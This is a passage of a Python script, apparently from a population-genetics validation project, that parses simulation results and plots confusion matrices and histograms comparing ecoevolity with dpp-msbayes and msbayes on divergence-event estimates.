col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
elif root_alpha_setting == "fixed":
col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
else:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
transform = ax.transAxes)
if (col_idx == last_col_idx) and (nrows > 1):
ax.text(1.015, 0.5,
row_key,
horizontalalignment = "left",
verticalalignment = "center",
rotation = 270.0,
transform = ax.transAxes)
# make sure y-axis is the same
y_max = float('-inf')
all_axes = fig.get_axes()
for ax in all_axes:
ymn, ymx = ax.get_ylim()
y_max = max(y_max, ymx)
for ax in all_axes:
ax.set_ylim(0.0, y_max)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
if ax.is_last_row() and ax.is_first_col():
continue
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
fig.text(0.5, 0.001,
parameter_label,
horizontalalignment = "center",
verticalalignment = "bottom",
size = 18.0)
fig.text(0.005, 0.5,
# "Density",
"Frequency",
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 18.0)
if nrows == 1:
gs.update(left = 0.08, right = 0.995, bottom = 0.17, top = 0.92)
else:
gs.update(left = 0.07, right = 0.98, bottom = 0.08, top = 0.97)
if linked_loci:
if nrows == 3:
gs.update(left = 0.10, right = 0.97, bottom = 0.09, top = 0.97)
else:
gs.update(left = 0.11, right = 0.97, bottom = 0.12, top = 0.95)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
plot_path = os.path.join(plot_dir,
"{0}-histograms.pdf".format(plot_file_prefix))
plt.savefig(plot_path)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_model_plots(
number_of_comparisons = 3,
include_all_sizes_fixed = True,
include_root_size_fixed = False,
linked_loci = None,
missing_data = False,
filtered_data = False,
include_variable_only = True,
show_all_models = False):
if show_all_models and (number_of_comparisons != 3):
raise Exception("show all models only supported for 3 comparisons")
if int(bool(linked_loci)) + int(missing_data) + int(filtered_data) > 1:
raise Exception("Can only specify linked_loci, missing_data, or filtered_data")
_LOG.info("Generating model plots...")
root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
locus_size_pattern = re.compile(r'root-\d+-\d00k-(?P<locus_size>\d+)l')
missing_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_missing>\d+)missing')
filtered_data_pattern = re.compile(r'root-\d+-\d00k-0(?P<p_singleton>\d+)singleton')
dpp_pattern = re.compile(r'-dpp-')
rj_pattern = re.compile(r'-rj-')
var_only_pattern = re.compile(r'var-only-')
cmap = truncate_color_map(plt.cm.binary, 0.0, 0.65, 100)
row_keys, results_batches = get_results_paths(project_util.VAL_DIR,
include_all_sizes_fixed = include_all_sizes_fixed,
include_root_size_fixed = include_root_size_fixed,
include_variable_only = include_variable_only)
if linked_loci:
row_keys, results_batches = get_linked_loci_results_paths(
project_util.VAL_DIR,
data_set_size = linked_loci,
include_variable_only = include_variable_only,
include_unlinked_only = True)
if missing_data:
row_keys, results_batches = get_missing_data_results_paths(
project_util.VAL_DIR,
include_variable_only = include_variable_only)
if filtered_data:
row_keys, results_batches = get_filtered_data_results_paths(
project_util.VAL_DIR,
include_variable_only = include_variable_only)
plt.close('all')
if missing_data or filtered_data:
fig = plt.figure(figsize = (9, 4.0))
elif linked_loci:
if include_variable_only:
fig = plt.figure(figsize = (7.25, 6.5))
else:
fig = plt.figure(figsize = (7.25, 4.6))
else:
fig = plt.figure(figsize = (9, 6.5))
nrows = len(results_batches)
ncols = len(results_batches.values()[0])
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
model_to_index = {
"000": 0,
"001": 1,
"010": 2,
"011": 3,
"012": 4,
}
index_to_model = {}
for k, v in model_to_index.items():
index_to_model[v] = k
for row_idx, row_key in enumerate(row_keys):
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
row_idx, col_idx, sim_dir, len(results_paths)))
true_map_nevents = []
true_map_model = []
true_map_nevents_probs = []
for i in range(number_of_comparisons):
true_map_nevents.append([0 for i in range(number_of_comparisons)])
true_map_nevents_probs.append([[] for i in range(number_of_comparisons)])
for i in range(5):
true_map_model.append([0 for i in range(5)])
true_map_nevents_probs.append([[] for i in range(5)])
true_nevents = tuple(int(x) for x in results["true_num_events"])
map_nevents = tuple(int(x) for x in results["map_num_events"])
true_model = tuple(x for x in results["true_model"])
map_model = tuple(x for x in results["map_model"])
true_nevents_cred_levels = tuple(float(x) for x in results["true_num_events_cred_level"])
true_model_cred_levels = tuple(float(x) for x in results["true_model_cred_level"])
assert(len(true_nevents) == len(map_nevents))
assert(len(true_nevents) == len(true_nevents_cred_levels))
assert(len(true_nevents) == len(true_model_cred_levels))
assert(len(true_nevents) == len(true_model))
assert(len(true_nevents) == len(map_model))
true_nevents_probs = []
map_nevents_probs = []
for i in range(len(true_nevents)):
true_nevents_probs.append(float(
results["num_events_{0}_p".format(true_nevents[i])][i]))
map_nevents_probs.append(float(
results["num_events_{0}_p".format(map_nevents[i])][i]))
assert(len(true_nevents) == len(true_nevents_probs))
assert(len(true_nevents) == len(map_nevents_probs))
mean_true_nevents_prob = sum(true_nevents_probs) / len(true_nevents_probs)
median_true_nevents_prob = pycoevolity.stats.median(true_nevents_probs)
true_model_probs = tuple(float(x) for x in results["true_model_p"])
assert(len(true_nevents) == len(true_model_probs))
mean_true_model_prob = sum(true_model_probs) / len(true_model_probs)
median_true_model_prob = pycoevolity.stats.median(true_model_probs)
nevents_within_95_cred = 0
model_within_95_cred = 0
ncorrect = 0
model_ncorrect = 0
for i in range(len(true_nevents)):
true_map_nevents[map_nevents[i] - 1][true_nevents[i] - 1] += 1
true_map_nevents_probs[map_nevents[i] - 1][true_nevents[i] - 1].append(map_nevents_probs[i])
if show_all_models:
true_map_model[model_to_index[map_model[i]]][model_to_index[true_model[i]]] += 1
if true_nevents_cred_levels[i] <= 0.95:
nevents_within_95_cred += 1
if true_model_cred_levels[i] <= 0.95:
model_within_95_cred += 1
if true_nevents[i] == map_nevents[i]:
ncorrect += 1
if true_model[i] == map_model[i]:
model_ncorrect += 1
p_nevents_within_95_cred = nevents_within_95_cred / float(len(true_nevents))
p_model_within_95_cred = model_within_95_cred / float(len(true_nevents))
p_correct = ncorrect / float(len(true_nevents))
p_model_correct = model_ncorrect / float(len(true_nevents))
_LOG.info("p(nevents within CS) = {0:.4f}".format(p_nevents_within_95_cred))
_LOG.info("p(model within CS) = {0:.4f}".format(p_model_within_95_cred))
ax = plt.subplot(gs[row_idx, col_idx])
if show_all_models:
ax.imshow(true_map_model,
origin = 'lower',
cmap = cmap,
interpolation = 'none',
aspect = 'auto'
)
for i, row_list in enumerate(true_map_model):
for j, n in enumerate(row_list):
ax.text(j, i,
str(n),
horizontalalignment = "center",
verticalalignment = "center",
fontsize = 6)
ax.text(0.98, 0.01,
"\\tiny$p(\\mathcal{{T}} \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
p_model_within_95_cred),
horizontalalignment = "right",
verticalalignment = "bottom",
transform = ax.transAxes)
ax.text(0.02, 1.01,
"\\tiny$p(\\hat{{\\mathcal{{T}}}} = \\mathcal{{T}}) = {0:.3f}$".format(
p_model_correct),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes)
ax.text(0.98, 1.01,
"\\tiny$\\widetilde{{p(\\mathcal{{T}}|\\mathbf{{D}})}} = {0:.3f}$".format(
median_true_model_prob),
horizontalalignment = "right",
verticalalignment = "top",
transform = ax.transAxes)
else:
ax.imshow(true_map_nevents,
origin = 'lower',
cmap = cmap,
interpolation = 'none',
aspect = 'auto'
# extent = [0.5, 3.5, 0.5, 3.5]
)
for i, row_list in enumerate(true_map_nevents):
for j, num_events in enumerate(row_list):
# if num_events > 0:
# n_probs = true_map_nevents_probs[i][j]
# assert len(n_probs) == num_events
# mean_p = sum(n_probs) / len(n_probs)
# median_p = pycoevolity.stats.median(n_probs)
# ax.text(j, i,
# "{0:d}\n{1:.3f}".format(num_events, median_p),
# horizontalalignment = "center",
# verticalalignment = "center",
# size = 8.0)
# else:
ax.text(j, i,
str(num_events),
horizontalalignment = "center",
verticalalignment = "center")
ax.text(0.98, 0.02,
"\\scriptsize$p(k \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
p_nevents_within_95_cred),
horizontalalignment = "right",
verticalalignment = "bottom",
transform = ax.transAxes)
ax.text(0.02, 0.98,
"\\scriptsize$p(\\hat{{k}} = k) = {0:.3f}$".format(
p_correct),
horizontalalignment = "left",
verticalalignment = "top",
transform = ax.transAxes)
ax.text(0.98, 0.98,
"\\scriptsize$\\widetilde{{p(k|\\mathbf{{D}})}} = {0:.3f}$".format(
median_true_nevents_prob),
horizontalalignment = "right",
verticalalignment = "top",
transform = ax.transAxes)
if row_idx == 0:
if linked_loci:
# locus_size = 1
locus_size_matches = locus_size_pattern.findall(sim_dir)
# if locus_size_matches:
assert len(locus_size_matches) == 1
locus_size = int(locus_size_matches[0])
col_header = "$\\textrm{{\\sffamily Locus length}} = {0}$".format(locus_size)
elif missing_data:
percent_missing = 0.0
missing_matches = missing_data_pattern.findall(sim_dir)
if missing_matches:
assert len(missing_matches) == 1
percent_missing = float("." + missing_matches[0]) * 100.0
col_header = "{0:.0f}\\% missing data".format(percent_missing)
elif filtered_data:
percent_sampled = 100.0
filtered_matches = filtered_data_pattern.findall(sim_dir)
if filtered_matches:
assert len(filtered_matches) == 1
percent_sampled = float("." + filtered_matches[0]) * 100.0
col_header = "{0:.0f}\\% singleton patterns".format(percent_sampled)
else:
if root_alpha_setting == "fixed-all":
pop_sizes = results["mean_pop_size_c1sp1"]
assert(len(set(pop_sizes)) == 1)
col_header = "$\\textrm{{\\sffamily All sizes}} = {0}$".format(pop_sizes[0])
elif root_alpha_setting == "fixed":
col_header = "$\\textrm{{\\sffamily Root size}} = 1.0$"
else:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
ax.text(0.5, 1.015,
col_header,
horizontalalignment = "center",
verticalalignment = "bottom",
transform = ax.transAxes)
if col_idx == last_col_idx:
ax.text(1.015, 0.5,
row_key,
horizontalalignment = "left",
verticalalignment = "center",
rotation = 270.0,
transform = ax.transAxes)
# show only the outside ticks
all_axes = fig.get_axes()
for ax in all_axes:
if not ax.is_last_row():
ax.set_xticks([])
if not ax.is_first_col():
ax.set_yticks([])
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
# Make sure ticks correspond only with number of events
if not show_all_models:
ax.xaxis.set_ticks(range(number_of_comparisons))
ax.yaxis.set_ticks(range(number_of_comparisons))
else:
ax.xaxis.set_ticks(range(5))
ax.yaxis.set_ticks(range(5))
if ax.is_last_row() and ax.is_first_col():
xtick_labels = [item for item in ax.get_xticklabels()]
for i in range(len(xtick_labels)):
if show_all_models:
xtick_labels[i].set_text(index_to_model[i])
else:
xtick_labels[i].set_text(str(i + 1))
ytick_labels = [item for item in ax.get_yticklabels()]
for i in range(len(ytick_labels)):
if show_all_models:
ytick_labels[i].set_text(index_to_model[i])
else:
ytick_labels[i].set_text(str(i + 1))
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
else:
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
# avoid doubled spines
all_axes = fig.get_axes()
for ax in all_axes:
for sp in ax.spines.values():
sp.set_visible(False)
sp.set_linewidth(2)
if ax.is_first_row():
ax.spines['top'].set_visible(True)
ax.spines['bottom'].set_visible(True)
else:
ax.spines['bottom'].set_visible(True)
if ax.is_first_col():
ax.spines['left'].set_visible(True)
ax.spines['right'].set_visible(True)
else:
ax.spines['right'].set_visible(True)
if show_all_models:
fig.text(0.5, 0.001,
"True model ($\\mathcal{{T}}$)",
horizontalalignment = "center",
verticalalignment = "bottom",
size = 18.0)
fig.text(0.005, 0.5,
"MAP model ($\\hat{{\\mathcal{{T}}}}$)",
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 18.0)
else:
fig.text(0.5, 0.001,
"True number of events ($k$)",
horizontalalignment = "center",
verticalalignment = "bottom",
size = 18.0)
fig.text(0.005, 0.5,
"MAP number of events ($\\hat{{k}}$)",
horizontalalignment = "left",
verticalalignment = "center",
rotation = "vertical",
size = 18.0)
if missing_data or filtered_data:
gs.update(left = 0.08, right = 0.98, bottom = 0.1, top = 0.96)
elif linked_loci:
if include_variable_only:
gs.update(left = 0.08, right = 0.97, bottom = 0.08, top = 0.97)
else:
if show_all_models:
gs.update(left = 0.09, right = 0.97, bottom = 0.13, top = 0.95)
else:
gs.update(left = 0.08, right = 0.97, bottom = 0.13, top = 0.95)
else:
gs.update(left = 0.08, right = 0.98, bottom = 0.08, top = 0.97)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
plot_type = "nevents"
if show_all_models:
plot_type = "models"
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
if linked_loci:
if include_variable_only:
plot_path = os.path.join(plot_dir,
"linkage-{0}-{1}.pdf".format(linked_loci, plot_type))
else:
plot_path = os.path.join(plot_dir,
"linkage-{0}-{1}-no-vo.pdf".format(linked_loci, plot_type))
elif missing_data:
plot_path = os.path.join(plot_dir,
"missing-data-{0}.pdf".format(plot_type))
elif filtered_data:
plot_path = os.path.join(plot_dir,
"filtered-data-{0}.pdf".format(plot_type))
else:
plot_path = os.path.join(plot_dir,
"{0}.pdf".format(plot_type))
plt.savefig(plot_path)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def generate_root_1000_500k_model_plots(
number_of_comparisons = 3):
_LOG.info("Generating model plots...")
root_alpha_pattern = re.compile(r'root-(?P<alpha_setting>\S+)-\d00k')
dpp_pattern = re.compile(r'-dpp-')
rj_pattern = re.compile(r'-rj-')
number_of_comparisons = 3
cmap = truncate_color_map(plt.cm.binary, 0.0, 0.65, 100)
row_keys, results_batches = get_root_1000_500k_results_paths(project_util.VAL_DIR)
plt.close('all')
fig = plt.figure(figsize = (3.5, 3.3))
nrows = 1
ncols = 1
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
for row_idx, row_key in enumerate(row_keys):
results_batch = results_batches[row_key]
last_col_idx = len(results_batch) - 1
for col_idx, (sim_dir, results_paths) in enumerate(results_batch):
root_alpha_matches = root_alpha_pattern.findall(sim_dir)
assert(len(root_alpha_matches) == 1)
root_alpha_setting = root_alpha_matches[0]
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
_LOG.info("row {0}, col {1} : {2} ({3} batches)".format(
row_idx, col_idx, sim_dir, len(results_paths)))
true_map_nevents = []
true_map_nevents_probs = []
for i in range(number_of_comparisons):
true_map_nevents.append([0 for i in range(number_of_comparisons)])
true_map_nevents_probs.append([[] for i in range(number_of_comparisons)])
true_nevents = tuple(int(x) for x in results["true_num_events"])
map_nevents = tuple(int(x) for x in results["map_num_events"])
true_nevents_cred_levels = tuple(float(x) for x in results["true_num_events_cred_level"])
true_model_cred_levels = tuple(float(x) for x in results["true_model_cred_level"])
assert(len(true_nevents) == len(map_nevents))
assert(len(true_nevents) == len(true_nevents_cred_levels))
assert(len(true_nevents) == len(true_model_cred_levels))
true_nevents_probs = []
map_nevents_probs = []
for i in range(len(true_nevents)):
true_nevents_probs.append(float(
results["num_events_{0}_p".format(true_nevents[i])][i]))
map_nevents_probs.append(float(
results["num_events_{0}_p".format(map_nevents[i])][i]))
assert(len(true_nevents) == len(true_nevents_probs))
assert(len(true_nevents) == len(map_nevents_probs))
mean_true_nevents_prob = sum(true_nevents_probs) / len(true_nevents_probs)
median_true_nevents_prob = pycoevolity.stats.median(true_nevents_probs)
nevents_within_95_cred = 0
model_within_95_cred = 0
ncorrect = 0
for i in range(len(true_nevents)):
true_map_nevents[map_nevents[i] - 1][true_nevents[i] - 1] += 1
true_map_nevents_probs[map_nevents[i] - 1][true_nevents[i] - 1].append(map_nevents_probs[i])
if true_nevents_cred_levels[i] <= 0.95:
nevents_within_95_cred += 1
if true_model_cred_levels[i] <= 0.95:
model_within_95_cred += 1
if true_nevents[i] == map_nevents[i]:
ncorrect += 1
p_nevents_within_95_cred = nevents_within_95_cred / float(len(true_nevents))
p_model_within_95_cred = model_within_95_cred / float(len(true_nevents))
p_correct = ncorrect / float(len(true_nevents))
_LOG.info("p(nevents within CS) = {0:.4f}".format(p_nevents_within_95_cred))
_LOG.info("p(model within CS) = {0:.4f}".format(p_model_within_95_cred))
ax = plt.subplot(gs[row_idx, col_idx])
ax.imshow(true_map_nevents,
origin = 'lower',
cmap = cmap,
interpolation = 'none',
aspect = 'auto'
)
for i, row_list in enumerate(true_map_nevents):
for j, num_events in enumerate(row_list):
ax.text(j, i,
str(num_events),
horizontalalignment = "center",
verticalalignment = "center")
# ax.text(0.99, 0.01,
# "$p(k \\in \\textrm{{\\sffamily CS}}) = {0:.3f}$".format(
# p_nevents_within_95_cred),
# horizontalalignment = "right",
# verticalalignment = "bottom",
# transform = ax.transAxes)
ax.text(0.01, 1.01,
"$p(\\hat{{k}} = k) = {0:.3f}$".format(
p_correct),
horizontalalignment = "left",
verticalalignment = "bottom",
transform = ax.transAxes)
ax.text(0.99, 1.01,
"$\\widetilde{{p(k|\\mathbf{{D}})}} = {0:.3f}$".format(
median_true_nevents_prob),
horizontalalignment = "right",
verticalalignment = "bottom",
transform = ax.transAxes)
ax.set_xlabel("True number of events ($k$)", labelpad = 8.0)
ax.set_ylabel("Estimated number of events ($\\hat{{k}}$)", labelpad = 8.0)
if row_idx == 0:
root_shape, root_scale = get_root_gamma_parameters(root_alpha_setting)
col_header = "$\\textrm{{\\sffamily Gamma}}({0}, {1})$".format(int(root_shape), root_scale)
# ax.text(0.5, 1.0,
# col_header,
# horizontalalignment = "center",
# verticalalignment = "bottom",
# transform = ax.transAxes)
if col_idx == last_col_idx:
pass
# ax.text(1.0, 0.5,
# row_key,
# horizontalalignment = "left",
# verticalalignment = "center",
# rotation = 270.0,
# transform = ax.transAxes)
# show tick labels only for lower-left plot
all_axes = fig.get_axes()
for ax in all_axes:
ax.xaxis.set_ticks(range(number_of_comparisons))
ax.yaxis.set_ticks(range(number_of_comparisons))
if ax.is_last_row() and ax.is_first_col():
xtick_labels = [item for item in ax.get_xticklabels()]
for i in range(len(xtick_labels)):
xtick_labels[i].set_text(str(i + 1))
ytick_labels = [item for item in ax.get_yticklabels()]
for i in range(len(ytick_labels)):
ytick_labels[i].set_text(str(i + 1))
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
else:
xtick_labels = ["" for item in ax.get_xticklabels()]
ytick_labels = ["" for item in ax.get_yticklabels()]
ax.set_xticklabels(xtick_labels)
ax.set_yticklabels(ytick_labels)
gs.update(left = 0.14, right = 0.99, bottom = 0.16, top = 0.92)
plot_dir = os.path.join(project_util.VAL_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
plot_path = os.path.join(plot_dir,
"root-1000-500k-nevents.pdf")
plt.savefig(plot_path)
_LOG.info("Plots written to {0!r}\n".format(plot_path))
def get_msbayes_results(
true_path,
sim_dir,
number_of_pairs = 3,
number_of_sims = 500,
posterior_sample_size = 2000,
prior_sample_size = 600000):
results = {
'divergence time': {'true': [], 'mean': [], 'lower': [], 'upper': []},
'root population size': {'true': [], 'mean': [], 'lower': [], 'upper': []},
'leaf population size': {'true': [], 'mean': [], 'lower': [], 'upper': []},
'nevents': {'true': [], 'map': [], 'cred_level': [], 'true_prob': [], 'map_prob': []},
'model': {'true': [], 'map': [], 'cred_level': [], 'true_prob': [], 'map_prob': []},
}
column_header_prefixes = {
'divergence time': ("PRI.t.",),
'root population size': ("PRI.aTheta.",),
'leaf population size': ("PRI.d1Theta.", "PRI.d2Theta."),
}
true_values = pycoevolity.parsing.get_dict_from_spreadsheets(
[true_path],
sep = '\t')
nsims = len(true_values.values()[0])
assert (nsims == number_of_sims)
for sim_idx in range(nsims):
posterior_path = os.path.join(sim_dir,
"d1-m1-s{sim_num}-{prior_sample_size}-posterior-sample.txt.gz".format(
sim_num = sim_idx + 1,
prior_sample_size = prior_sample_size))
_LOG.info("Parsing {0}".format(posterior_path))
posterior = pycoevolity.parsing.get_dict_from_spreadsheets(
[posterior_path],
sep = '\t')
for pair_idx in range(number_of_pairs):
for parameter_key, header_prefixes in column_header_prefixes.items():
for header_prefix in header_prefixes:
header = "{0}{1}".format(header_prefix, pair_idx + 1)
if parameter_key.endswith("size"):
true_val = float(true_values[header][sim_idx]) / 4.0
post_sum = pycoevolity.stats.get_summary((float(x) / 4.0) for x in posterior[header])
else:
true_val = float(true_values[header][sim_idx])
post_sum = pycoevolity.stats.get_summary(float(x) for x in posterior[header])
results[parameter_key]['true'].append(true_val)
results[parameter_key]['mean'].append(post_sum['mean'])
results[parameter_key]['lower'].append(post_sum['qi_95'][0])
results[parameter_key]['upper'].append(post_sum['qi_95'][1])
true_div_times = [float(true_values["PRI.t.{0}".format(i + 1)][sim_idx]) for i in range(number_of_pairs)]
n_post_samples = len(posterior["PRI.Psi"])
div_times = []
for post_idx in range(n_post_samples):
div_times.append([float(posterior["PRI.t.{0}".format(i + 1)][post_idx]) for i in range(number_of_pairs)])
assert len(div_times) == n_post_samples
true_model = get_standardized_partiton_str(true_div_times)
models = [get_standardized_partiton_str(t) for t in div_times]
model_freqs = pycoevolity.stats.get_freqs(models)
sorted_model_freqs = sorted(model_freqs.items(), reverse = True,
key = lambda x: x[1])
map_model = sorted_model_freqs[0][0]
true_model_prob = model_freqs[true_model]
map_model_prob = model_freqs[map_model]
model_cred_level = 0.0
for n, p in sorted_model_freqs:
if n == true_model:
break
model_cred_level += p
results['model']['true'].append(true_model)
results['model']['map'].append(map_model)
results['model']['true_prob'].append(true_model_prob)
results['model']['map_prob'].append(map_model_prob)
results['model']['cred_level'].append(model_cred_level)
true_nevents = int(true_values["PRI.Psi"][sim_idx])
nevent_freqs = pycoevolity.stats.get_freqs(int(x) for x in posterior["PRI.Psi"])
sorted_nevent_freqs = sorted(nevent_freqs.items(), reverse = True,
key = lambda x: x[1])
map_nevents = sorted_nevent_freqs[0][0]
true_nevents_prob = nevent_freqs[true_nevents]
map_nevents_prob = nevent_freqs[map_nevents]
results['nevents']['true'].append(true_nevents)
results['nevents']['map'].append(map_nevents)
results['nevents']['true_prob'].append(true_nevents_prob)
results['nevents']['map_prob'].append(map_nevents_prob)
cred_level = 0.0
for n, p in sorted_nevent_freqs:
if n == true_nevents:
break
cred_level += p
results['nevents']['cred_level'].append(cred_level)
assert (len(results['divergence time']['true']) == number_of_sims * number_of_pairs)
assert (len(results['root population size']['true']) == number_of_sims * number_of_pairs)
assert (len(results['leaf population size']['true']) == number_of_sims * number_of_pairs * 2)
assert (len(results['nevents']['true']) == number_of_sims)
assert (len(results['model']['true']) == number_of_sims)
return results
def generate_bake_off_plots(
number_of_pairs = 3,
number_of_sims = 500,
posterior_sample_size = 2000,
prior_sample_size = 500000,
include_msbayes = False):
_LOG.info("Generating plots of bake-off results...")
plot_dir = os.path.join(project_util.BAKE_OFF_DIR, "plots")
if not os.path.exists(plot_dir):
os.mkdir(plot_dir)
msbayes_results = None
if include_msbayes:
msbayes_results = get_msbayes_results(
true_path = os.path.join(project_util.BAKE_OFF_DIR,
"results",
"msbayes",
"pymsbayes-results",
"observed-summary-stats",
"observed-1.txt"),
sim_dir = os.path.join(project_util.BAKE_OFF_DIR,
"results",
"msbayes",
"pymsbayes-results",
"pymsbayes-output",
"d1",
"m1"),
number_of_pairs = number_of_pairs,
number_of_sims = number_of_sims,
posterior_sample_size = posterior_sample_size,
prior_sample_size = prior_sample_size)
dpp_msbayes_results = get_msbayes_results(
true_path = os.path.join(project_util.BAKE_OFF_DIR,
"results",
"dpp-msbayes",
"pymsbayes-results",
"observed-summary-stats",
"observed-1.txt"),
sim_dir = os.path.join(project_util.BAKE_OFF_DIR,
"results",
"dpp-msbayes",
"pymsbayes-results",
"pymsbayes-output",
"d1",
"m1"),
number_of_pairs = number_of_pairs,
number_of_sims = number_of_sims,
posterior_sample_size = posterior_sample_size,
prior_sample_size = prior_sample_size)
results_paths = glob.glob(os.path.join(project_util.VAL_DIR,
"03pairs-dpp-root-0100-040k-0200l",
"batch00[12345]",
"results.csv.gz"))
results = pycoevolity.parsing.get_dict_from_spreadsheets(
results_paths,
sep = "\t",
offset = 0)
cmap = truncate_color_map(plt.cm.binary, 0.0, 0.65, 100)
parameter_dict = {
"divergence time": [
"root_height_c1sp1",
"root_height_c2sp1",
"root_height_c3sp1",
],
"root population size": [
"pop_size_root_c1sp1",
"pop_size_root_c2sp1",
"pop_size_root_c3sp1",
],
"leaf population size": [
"pop_size_c1sp1",
"pop_size_c2sp1",
"pop_size_c3sp1",
"pop_size_c1sp2",
"pop_size_c2sp2",
"pop_size_c3sp2",
],
"nevents": [],
"model": [],
}
col_headers = [
'ecoevolity',
'dpp-msbayes',
]
if include_msbayes:
col_headers.append('msbayes')
for parameter_key, parameters in parameter_dict.items():
parameter_label = parameter_key
parameter_symbol = "\\tau"
if parameter_key.endswith("size"):
parameter_symbol = "N_e\\mu"
plt.close('all')
if include_msbayes:
fig = plt.figure(figsize = (9, 3))
else:
fig = plt.figure(figsize = (6, 3))
nrows = 1
ncols = len(col_headers)
gs = gridspec.GridSpec(nrows, ncols,
wspace = 0.0,
hspace = 0.0)
if parameter_key == "nevents":
ecoevolity_results = {'true': [], 'map': [], 'cred_level': [],
'true_prob': [], 'map_prob': []}
ecoevolity_results['true'].extend(int(x) for x in results["true_num_events"])
ecoevolity_results['map'].extend(int(x) for x in results["map_num_events"])
ecoevolity_results['cred_level'].extend(float(x) for x in results["true_num_events_cred_level"])
for i in range(len(results["map_num_events"])):
map_n = results["map_num_events"][i]
map_p = float(results["num_events_{0}_p".format(map_n)][i])
true_n = results["true_num_events"][i]
true_p = float(results["num_events_{0}_p".format(true_n)][i])
ecoevolity_results["map_prob"].append(map_p)
ecoevolity_results["true_prob"].append(true_p)
all_results = {
'ecoevolity' : ecoevolity_results,
'dpp-msbayes': dpp_msbayes_results[parameter_key],
}
if include_msbayes:
all_results['msbayes'] = msbayes_results[parameter_key]
row_idx = 0
for col_idx, col_header in enumerate(col_headers):
r = all_results[col_header]
true_nevents = r['true']
map_nevents = r['map']
map_nevents_probs = r['map_prob']
true_nevents_probs = r['true_prob']
true_nevents_cred_levels = r['cred_level']
assert(len(true_nevents) == len(map_nevents))
assert(len(true_nevents) == len(true_nevents_cred_levels))
assert(len(true_nevents) == len(map_nevents_probs))
assert(len(true_nevents) == len(true_nevents_probs))
mean_true_nevents_prob = sum(true_nevents_probs) / len(true_nevents_probs)
median_true_nevents_prob = pycoevolity.stats.median(true_nevents_probs)
nevents_within_95_cred = 0
ncorrect = 0
true_map_nevents = []
true_map_probs = []
for i in range(number_of_pairs):
true_map_nevents.append([0 for i in range(number_of_pairs)])
true_map_probs.append([[] for i in range(number_of_pairs)])
for i in range(len(true_nevents)):
true_map_nevents[map_nevents[i] - 1][true_nevents[i] - 1] += 1
true_map_probs[map_nevents[i] - 1][true_nevents[i] - 1].append(map_nevents_probs[i])
if true_nevents_cred_levels[i] <= 0.95:
nevents_within_95_cred += 1
if true_nevents[i] == map_nevents[i]:
ncorrect += 1
p_nevents_within_95_cred = nevents_within_95_cred / float(len(true_nevents))
p_correct = ncorrect / float(len(true_nevents))
_LOG.info("p(nevents within CS) = {0:.4f}".format(p_nevents_within_95_cred))
ax = plt.subplot(gs[row_idx, col_idx])
ax.imshow(true_map_nevents,
origin = 'lower',
cmap = cmap,
interpolation = 'none',
aspect = 'auto'
# extent = [0.5, 3.5, 0.5, 3.5]
)
for i, row_list in enumerate(true_map_nevents):
for j, num_events in enumerate(row_list):
# if num_events > 0:
# map_probs = true_map_probs[i][j]
# assert len(map_probs) == num_events
# mean_prob = sum(map_probs) / len(map_probs)
# median_prob = pycoevolity.stats.median(map_probs)
# ax.text(j, i,
# "{0:d}\n{1:.3f}".format(num_events, median_prob),
# horizontalalignment = "center",
# verticalalignment = "center")
# else:
ax.text(j, i,
str(num_events),
horizontalalignment = "center",
verticalalignment = "center")
ax.text(0.98, 0.02,
